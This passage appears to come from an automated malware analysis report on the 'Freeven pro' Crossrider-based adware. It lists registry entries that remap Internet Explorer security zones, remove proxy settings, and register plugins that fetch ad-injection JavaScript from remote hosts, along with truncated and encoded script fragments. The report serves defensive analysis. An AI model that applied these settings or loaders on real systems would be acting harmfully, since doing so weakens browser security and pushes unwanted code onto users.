"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/223.js"
[HKCU\Software\Freeven pro\Plugins\78]
"Name" = "CrossriderInfo"
[HKCU\Software\Freeven pro\Plugins\354]
"Name" = "categories"
[HKCU\Software\Freeven pro\Plugins]
"OnRequestPluginList" = "14,42,41,39,38,43,45,64"
[HKCU\Software\Freeven pro\Plugins\40]
"Name" = "IEExtension"
[HKCU\Software\Freeven pro\Plugins\17]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/17.js"
[HKCU\Software\Freeven pro\Plugins\3]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/3.js"
[HKCU\Software\Freeven pro\Manifest]
"DisableIe" = "true"
[HKCU\Software\Freeven pro\Plugins\391]
"Name" = "50intext_new_m"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Freeven pro\Plugins\7]
"Name" = "hooks"
[HKCU\Software\Freeven pro\Plugins\242]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\3]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\Freeven pro\Plugins\41]
"Name" = "IEInfo"
[HKCU\Software\Freeven pro\Plugins\9]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/9.js"
[HKCU\Software\Freeven pro\Plugins\242]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/242.js"
[HKCU\Software\Freeven pro\Plugins\376]
"Version" = "3"
The Worm modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Worm modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Worm deletes the following registry key(s):
[HKCU\Software\Freeven pro\Plugins\177]
[HKCU\Software\Freeven pro\Plugins\184]
[HKCU\Software\Freeven pro\Plugins\4]
[HKCU\Software\Freeven pro\Plugins\191]
[HKCU\Software\Freeven pro\Plugins\37]
[HKCU\Software\Freeven pro\Plugins\36]
[HKCU\Software\Freeven pro\Plugins\35]
[HKCU\Software\Freeven pro\Plugins\13]
[HKCU\Software\Freeven pro\Plugins\38]
[HKCU\Software\Freeven pro\Plugins\14]
[HKCU\Software\Freeven pro\Plugins\17]
[HKCU\Software\Freeven pro\Plugins\91]
[HKCU\Software\Freeven pro\Plugins\93]
[HKCU\Software\Freeven pro\Plugins\207]
[HKCU\Software\Freeven pro\Plugins\78]
[HKCU\Software\Freeven pro\Plugins\72]
[HKCU\Software\Freeven pro\Plugins\94]
[HKCU\Software\Freeven pro\Plugins\64]
[HKCU\Software\Freeven pro\Plugins\223]
[HKCU\Software\Freeven pro\Plugins\244]
[HKCU\Software\Freeven pro\Plugins\246]
[HKCU\Software\Freeven pro\Plugins\242]
[HKCU\Software\Freeven pro\Plugins\182]
[HKCU\Software\Freeven pro\Plugins\183]
[HKCU\Software\Freeven pro\Plugins\1]
[HKCU\Software\Freeven pro\Plugins\3]
[HKCU\Software\Freeven pro\Plugins\2]
[HKCU\Software\Freeven pro\Plugins\21]
[HKCU\Software\Freeven pro\Plugins\22]
[HKCU\Software\Freeven pro\Plugins]
[HKCU\Software\Freeven pro\Plugins\28]
[HKCU\Software\Freeven pro\Plugins\47]
[HKCU\Software\Freeven pro\Plugins\102]
[HKCU\Software\Freeven pro\Plugins\103]
[HKCU\Software\Freeven pro\Plugins\104]
[HKCU\Software\Freeven pro\Plugins\42]
[HKCU\Software\Freeven pro\Plugins\43]
[HKCU\Software\Freeven pro\Plugins\40]
[HKCU\Software\Freeven pro\Plugins\41]
[HKCU\Software\Freeven pro\Plugins\46]
[HKCU\Software\Freeven pro\Plugins\39]
[HKCU\Software\Freeven pro\Plugins\44]
[HKCU\Software\Freeven pro\Plugins\45]
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process Freeven pro-codedownloader.exe:720 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKCU\Software\Freeven pro\Plugins\42]
"Name" = "IEInternal"
[HKCU\Software\Freeven pro\Installer]
"srcid" = "001360"
[HKCU\Software\Freeven pro\Plugins\207]
"Name" = "dbWrapper"
[HKCU\Software\Freeven pro\Plugins\47]
"Name" = "resources_background"
[HKCU\Software\Freeven pro\Plugins\104]
"Name" = "jollywallet_m"
[HKCU\Software\Freeven pro\Plugins\4]
"Name" = "jquery_1_7_1"
[HKCU\Software\Freeven pro\Plugins\78]
"URL" = "http://js.clientstaticserv.com/plugins/mins/CrossriderInfo.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 29 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Freeven pro\Plugins\14]
"URL" = "http://js.clientstaticserv.com/plugins/mins/CrossriderUtils.js"
[HKCU\Software\Freeven pro\Plugins\182]
"Version" = "3"
[HKCU\Software\Freeven pro\Plugins\40]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\102]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/dealply_m.js"
[HKCU\Software\Freeven pro\Plugins\183]
"URL" = "http://js.clientstaticserv.com/plugins/mins/tabsWrapper.js"
[HKCU\Software\Freeven pro\Manifest]
"Manifest" = "NA"
[HKCU\Software\Freeven pro\Plugins\47]
"Version" = "3"
[HKCU\Software\Freeven pro\Manifest]
"IsButtonEnabled" = "false"
[HKCU\Software\Freeven pro\Plugins\36]
"Name" = "IEBackground"
[HKCU\Software\Freeven pro\Plugins\37]
"Version" = "6"
[HKCU\Software\Freeven pro\Plugins\39]
"Version" = "5"
[HKCU\Software\Freeven pro\Manifest]
"PublisherName" = "Freeven"
[HKCU\Software\Freeven pro\Plugins\21]
"Version" = "5"
[HKCU\Software\Freeven pro\Installer]
"Params" = "{ source_id : 001360, sub_id : 0, uzid : 0"
[HKCU\Software\Freeven pro\Plugins\45]
"Version" = "4"
[HKCU\Software\Crossrider]
"Verifier" = "283fbbb93af62851d4ee04659eadac21"
[HKCU\Software\Freeven pro\Plugins\1]
"Version" = "10"
[HKCU\Software\Freeven pro\Plugins\104]
"Version" = "9"
[HKCU\Software\Freeven pro\Plugins\244]
"Version" = "2"
[HKCU\Software\Freeven pro\Manifest]
"Version" = "22"
"Description" = "Feven Shopping Companion"
[HKCU\Software\Freeven pro\Plugins\14]
"Version" = "11"
[HKCU\Software\Freeven pro\Plugins\91]
"Name" = "monetizationLoader.js"
[HKCU\Software\Freeven pro\Plugins\207]
"URL" = "http://js.clientstaticserv.com/plugins/mins/dbWrapper.js"
[HKCU\Software\Freeven pro\Plugins\13]
"Name" = "CrossriderAppUtils"
[HKCU\Software\Freeven pro]
"ActiveAppId" = "54248"
[HKCU\Software\Freeven pro\Plugins\78]
"Name" = "CrossriderInfo"
[HKCU\Software\Freeven pro\Plugins\64]
"Version" = "3"
[HKCU\Software\Freeven pro\Plugins\41]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEInfo.js"
[HKCU\Software\Freeven pro\Plugins\207]
"Version" = "2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Freeven pro\Manifest]
"RunInFrame" = "false"
"ChangePrevious" = "false"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Freeven pro\Plugins\45]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEOnRequest.js"
[HKCU\Software\Freeven pro\Plugins\94]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEPopup.js"
[HKCU\Software\Freeven pro\Plugins\244]
"Name" = "engageya_inner_m"
[HKCU\Software\Freeven pro\Manifest]
"EnableSearchIE" = "false"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Freeven pro\Plugins\17]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\177]
"URL" = "http://js.clientstaticserv.com/plugins/mins/crossriderDashboard.js"
[HKCU\Software\Freeven pro\Plugins\78]
"Version" = "5"
[HKCU\Software\Freeven pro\Plugins\246]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/setup.js"
[HKCU\Software\Freeven pro\Plugins\4]
"URL" = "http://js.clientstaticserv.com/plugins/javascripts/jquery-1_7_1_min.js"
[HKCU\Software\Freeven pro\Plugins\2]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKCU\Software\Freeven pro\Plugins\64]
"Name" = "appApiMessage"
[HKCU\Software\Freeven pro\Plugins\72]
"URL" = "http://js.clientstaticserv.com/plugins/mins/appApiValidation.js"
[HKCU\Software\Freeven pro\Plugins\13]
"Version" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Freeven pro\Manifest]
"homepageurl" = "NA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Freeven pro\Plugins]
"AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,182,183,207,72,93,102,103,104,184,191,223,242,244,177,91,28"
[HKCU\Software\Freeven pro\Plugins\46]
"Name" = "IETimers"
[HKCU\Software\Freeven pro\Plugins\242]
"Name" = "price_gong_m"
[HKCU\Software\Freeven pro\Plugins\91]
"Version" = "46"
[HKLM\SOFTWARE\Freeven pro\IE\Profiles]
"S-1-5-21-1844237615-1960408961-1801674531-1003" = "1"
[HKCU\Software\Freeven pro\Installer]
"zdata" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Freeven pro\Installer]
"osName" = "XP32"
[HKCU\Software\Freeven pro\Code]
"BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Freeven pro\Plugins\35]
"Name" = "IEAjax"
[HKCU\Software\Freeven pro\Manifest]
"UninstallerOfferAction" = "NA"
[HKCU\Software\Freeven pro\Plugins\36]
"Version" = "8"
[HKCU\Software\Freeven pro\Plugins\191]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/ciuvo_m.js"
[HKCU\Software\Freeven pro\Plugins\94]
"Name" = "IEPopup"
[HKCU\Software\Freeven pro\Manifest]
"BgVersion" = "1"
[HKCU\Software\Freeven pro\Installer]
"ErrorsDomain" = "http://errors.clientstaticserv.com"
[HKCU\Software\Freeven pro\Plugins\36]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEBackground.js"
[HKCU\Software\Freeven pro\Plugins\1]
"URL" = "http://js.clientstaticserv.com/plugins/mins/base.js"
[HKCU\Software\Freeven pro\Plugins\47]
"URL" = "http://js.clientstaticserv.com/plugins/mins/resources_background.js"
[HKCU\Software\Freeven pro\Installer]
"FullVersion" = "1.34.5.4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Freeven pro\Plugins\39]
"Name" = "IEDatabase"
[HKCU\Software\Freeven pro\Plugins\28]
"URL" = "http://js.clientstaticserv.com/plugins/mins/initializer.js"
[HKCU\Software\Freeven pro\Plugins]
"NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,72,28"
[HKCU\Software\Freeven pro\Plugins\42]
"Version" = "9"
[HKCU\Software\Freeven pro\Plugins\4]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\41]
"Version" = "7"
[HKCU\Software\Freeven pro\Plugins\191]
"Version" = "5"
[HKCU\Software\Freeven pro\Plugins\103]
"Version" = "8"
[HKCU\Software\Freeven pro\Plugins\22]
"Version" = "5"
[HKCU\Software\Freeven pro\Plugins\46]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IETimers.js"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 73 70 00 7B 22 24 9A 53 63 90 29 58 F2 CB D2"
[HKCU\Software\Freeven pro\Plugins\2]
"Name" = "ie8_fix_1"
[HKCU\Software\Freeven pro\Plugins\244]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/engageya_inner_m.js"
[HKCU\Software\Freeven pro\Plugins\183]
"Name" = "tabsWrapper"
[HKCU\Software\Freeven pro\Plugins]
"BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,183,207,47,182,72,93,102,184,191,223,242,244,91"
[HKCU\Software\Freeven pro\Plugins\21]
"Name" = "debug"
[HKCU\Software\Freeven pro\Plugins]
"BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64,72"
[HKCU\Software\Freeven pro\Installer]
"subid" = "0"
[HKCU\Software\Freeven pro\Plugins\102]
"Version" = "6"
[HKCU\Software\Freeven pro\Plugins\28]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\246]
"Name" = "setup"
[HKCU\Software\Freeven pro\Plugins]
"OnRequestPluginList" = "14,42,41,39,38,43,45,64,72"
[HKCU\Software\Freeven pro\Installer]
"DefaultBrowser" = "ie"
"FullVersionForUrl" = "1_34_05_04"
[HKCU\Software\Freeven pro\Plugins\103]
"URL" = "http://js.clientstaticserv.com/plugins/javascripts/monetization/geo/intext_5_m.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Freeven pro\Manifest]
"ThanksUrl" = "NA"
"PublisherId" = "21636"
[HKCU\Software\Freeven pro\Plugins\1]
"Name" = "base"
[HKCU\Software\Freeven pro\Plugins\17]
"Name" = "jQuery"
[HKCU\Software\Freeven pro\Plugins\38]
"Name" = "IECallbacks"
[HKCU\Software\Freeven pro\Manifest]
"AddressbarURL" = "NA"
[HKCU\Software\Freeven pro\Plugins\22]
"Name" = "resources"
[HKCU\Software\Freeven pro\Plugins\72]
"Version" = "5"
[HKCU\Software\Freeven pro\Plugins\44]
"Name" = "IEMisc"
[HKCU\Software\Freeven pro\Plugins\183]
"Version" = "3"
[HKCU\Software\Freeven pro\Plugins\2]
"Version" = "2"
[HKCU\Software\Freeven pro\Manifest]
"ModeType" = "production"
[HKCU\Software\Freeven pro\Plugins\35]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\14]
"Name" = "CrossriderUtils"
[HKCU\Software\Freeven pro\Plugins\102]
"Name" = "dealply_m"
[HKCU\Software\Freeven pro\Manifest]
"UninstallerOfferUrl" = "NA"
[HKCU\Software\Freeven pro\Update]
"LastCheck" = "1427668149"
[HKCU\Software\Freeven pro\Plugins\177]
"Version" = "2"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Freeven pro\Plugins\46]
"Version" = "5"
[HKCU\Software\Freeven pro\Manifest]
"PluginsManifestVersion" = "17"
[HKCU\Software\Freeven pro\Plugins\184]
"Version" = "9"
[HKCU\Software\Freeven pro\Plugins\37]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEBrowserEvents.js"
[HKCU\Software\Freeven pro\Plugins\93]
"Name" = "superfish_no_coupons_m"
[HKCU\Software\Freeven pro\Plugins\42]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEInternal.js"
[HKCU\Software\Freeven pro\Plugins\38]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IECallbacks.js"
[HKCU\Software\Freeven pro\Plugins\43]
"Name" = "IEMessaging"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Freeven pro\Plugins\22]
"URL" = "http://js.clientstaticserv.com/plugins/mins/resources.js"
[HKCU\Software\Freeven pro\Plugins\37]
"Name" = "IEBrowserEvents"
[HKCU\Software\Freeven pro\Plugins\35]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEAjax.js"
[HKCU\Software\Freeven pro\Manifest]
"SetNewTab" = "false"
[HKCU\Software\Freeven pro\Manifest]
"Name" = "Freeven pro"
[HKCU\Software\Freeven pro\Plugins\94]
"Version" = "2"
[HKCU\Software\Freeven pro\Plugins\246]
"Version" = "9"
[HKCU\Software\Freeven pro\Plugins\3]
"Version" = "2"
"Name" = "ie8_fix_2"
[HKCU\Software\Freeven pro\Plugins\184]
"Name" = "noproblemppc_m"
[HKCU\Software\Freeven pro\Plugins\13]
"URL" = "http://js.clientstaticserv.com/plugins/mins/CrossriderAppUtils.js"
[HKLM\SOFTWARE\Freeven pro\IE]
"TotalProfiles" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Freeven pro\Plugins\43]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEMessaging.js"
[HKCU\Software\Freeven pro\Plugins\38]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\182]
"Name" = "openUrl"
[HKCU\Software\Freeven pro\Plugins\44]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEMisc.js"
[HKCU\Software\Freeven pro\Code]
"NewTabJavaScript" = ""
[HKCU\Software\Freeven pro\Plugins\177]
"Name" = "crossriderDashboard"
[HKCU\Software\Freeven pro\Installer]
"Time" = "1427668122"
[HKCU\Software\Freeven pro\Plugins\93]
"Version" = "9"
[HKCU\Software\Freeven pro\Plugins\45]
"Name" = "IEOnRequest"
[HKCU\Software\Freeven pro\Plugins\223]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE2NTY4NGIxMTBkMWIwMzNkMDMwNjRkNWI0OTViMTExYjA3MTg0YjQ1NDAwMjBkMTc1NzE5MWExYjEwMGUwYjRmMGExNjE0NDAwMDBiMDMwMzFmMTU0NjQ4NGQ1YTQ1NWY0NjU4NWE1NjVmNGM1NjFmMDEwZDFkMDUwZTA1NDcxMzBhNTAwMDFkMTMwMzBiNWMzNjI2M2EzZDNjM2IyMjM4MjYyNTJjMmIyNjNjMjYyYTJlMjMyYjNlMzY1YjU1NjU3YTRhMDEwNjFhMDYwMDE3MzAwYjUxNTI1MTU4NWQ1MjQ1NzM1OTRmNTM0ODUzMWMwYTEzMWQxMDFhMGUxZjRhNGI0YTM0NDMxYTExMTYxZjAzMDExZjBkNGQzYzYzMDQ=', 'joaiyyoshq'); }"
[HKCU\Software\Freeven pro\Plugins\41]
"Name" = "IEInfo"
[HKCU\Software\Freeven pro\Plugins\104]
"JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[104] = function() { if (!appAPI.internal.monetization.shouldRunByVertical(104, [shopping])){ return; } var app_id='0'; var uid='0'; var app_name = ''; try{app_name = '&name=' encodeURIComponent(appAPI.appInfo.name);} catch(e) {app_name='';} try{app_id = appAPI.appInfo.id;}catch(err){} if (appAPI && appAPI.installer && appAPI.installer.getParams) { app_id = appAPI.installer.getParams().source_id; } if(appAPI && appAPI.installer && appAPI.installer.getUserId){uid=appAPI.installer.getUserId();} var token = appAPI.db.get(jw_token); if(token === '' || token===null || token === undefined){ var S4 = function() {return (((1 Math.random())*0x10000)|0).toString(16).substring(1);}; token=(S4() S4() - S4() - S4() - S4() - S4() S4() S4()); appAPI.db.set(jw_token,toke15"
[HKCU\Software\Freeven pro\Code]
"AppJavaScript" = ""
[HKCU\Software\Freeven pro\Plugins\46]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setIn5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Freeven pro\Plugins\28]
"Name" = "initializer"
[HKCU\Software\Freeven pro\Plugins\43]
"Version" = "5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Freeven pro\Manifest]
"UpdateInterval" = "360"
[HKCU\Software\Freeven pro\Plugins\64]
"URL" = "http://js.clientstaticserv.com/plugins/mins/appApiMessage.js"
[HKCU\Software\Freeven pro\Plugins\102]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('..."
[HKCU\Software\Freeven pro\Plugins\2]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie8_fix_1.js"
[HKCU\Software\Freeven pro\Plugins\223]
"Name" = "imonomy_m"
[HKCU\Software\Freeven pro\Plugins\39]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEDatabase.js"
[HKCU\Software\Freeven pro\Plugins\44]
"Version" = "6"
[HKCU\Software\Freeven pro\Plugins\223]
"Version" = "5"
[HKCU\Software\Freeven pro\Plugins\184]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/noproblemppc_m.js"
[HKCU\Software\Freeven pro\Plugins\72]
"Name" = "appApiValidation"
[HKCU\Software\Freeven pro\Plugins\103]
"Name" = "intext_5_m"
[HKCU\Software\Freeven pro\Plugins\223]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/imonomy_m.js"
[HKCU\Software\Freeven pro\Plugins\104]
"URL" = "http://js.clientstaticserv.com/plugins/javascripts/monetization/geo/jollywallet_m.js"
[HKCU\Software\Freeven pro\Plugins\93]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/superfish_no_coupons_m.js"
[HKCU\Software\Freeven pro\Plugins\40]
"Name" = "IEExtension"
[HKCU\Software\Freeven pro\Plugins\38]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberO5"
[HKCU\Software\Crossrider]
"Bic" = "11992E1999324ACFB8E0C19B718E3265IE"
[HKCU\Software\Freeven pro\Plugins\17]
"URL" = "http://js.clientstaticserv.com/plugins/mins/jQuery.js"
[HKCU\Software\Freeven pro\Plugins\3]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie8_fix_2.js"
[HKCU\Software\Freeven pro\Manifest]
"DisableIe" = "true"
[HKCU\Software\Freeven pro\Plugins\21]
"URL" = "http://js.clientstaticserv.com/plugins/mins/debug.js"
[HKCU\Software\Freeven pro\Installer]
"CodeDownloadDomain" = "http://js.clientstaticserv.com"
[HKCU\Software\Freeven pro\Plugins\35]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k
[HKCU\Software\Freeven pro\Plugins\242]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/price_gong_m.js"
"Version" = "3"
[HKCU\Software\Freeven pro\Plugins\3]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKCU\Software\Freeven pro\Plugins\182]
"URL" = "http://js.clientstaticserv.com/plugins/mins/openUrl.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\Freeven pro\Plugins\40]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEExtension.js"
[HKCU\Software\Freeven pro\Plugins\182]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var c={DUMMY_PAGE_URL:http://page.our-app.net/blank/resource.html};(function(){if(appAPI&&appAPI.internal&&appAPI.internal.hosts&&typeof appAPI.internal.hosts.dummyPageUrl===string&&appAPI.internal.hosts.dummyPageUrl.length>0){c.DUMMY_PAGE_URL=appAPI.internal.hosts.dummyPageUrl;}}());appAPI.openURL=(function(){var d=appAPI.openURL;var e=function(g){d({url:c.DUMMY_PAGE_URL ?appid= appAPI.appInfo.id &resourcepath= escape(g.resourcePath) &rnd= (new Date()).getTime(),where:g.where,focus:g.focus,focusTimer:g.focusTimer,left:g.left,top:g.top,height:g.height,width:g.width});};var f=function(g){if(!appAPI.utils.isObject(g)){return;}if(!appAPI.utils.isDefined(g.resourcePath)){d(g);return;}e(g);};return function(h,g){var i=h;try{if(appAPI.utils.isString(h)){d(h,g);return;}f(i);}catch(j){}};}());var a=function(){(function(){var f=document.createElement(link);f.type=image/x-icon;f.rel=shortcut icon;f.href=;document.getElementsByTagName(head)[0]e5"
[HKCU\Software\Freeven pro\Plugins\22]
"JavaScript" = "(function(a){appAPI.queueManager={queue:[],register:function(b){this.queue.push(b);}};appAPI.ready=function(c,b){a.when.apply(null,appAPI.queueManager.queue).then(function(){a.when(appAPI.initializerPlugin.isReady(b)).then(function(){new Function('if (typeof jQuery === undefined) { jQuery = $jquery_171; }(' appAPI.resources.parseIncludeJS(c.toString()) )($jquery_171))();});});};}($jquery_171));var CrossRiderResourcesManager=(function(z){var B={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.resources,env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:appAPI.debugManager.isDebug()&&appAPI.debugManager.getResourcesPath(),isIE7:z.browser.msie&&z.browser.version*1==7},x=new z.Deferred(),h=K(meta)||{},D=K(remote_resources)||{remoteId:0},e=K(queue)||{},g=initialVersion=K(lastVersion)||0;return z.Class.extend({init:function(){appAPI.queueManager.register(x.promise());if(B.isDebug){x.resolve();}el5"
[HKCU\Software\Freeven pro\Plugins\78]
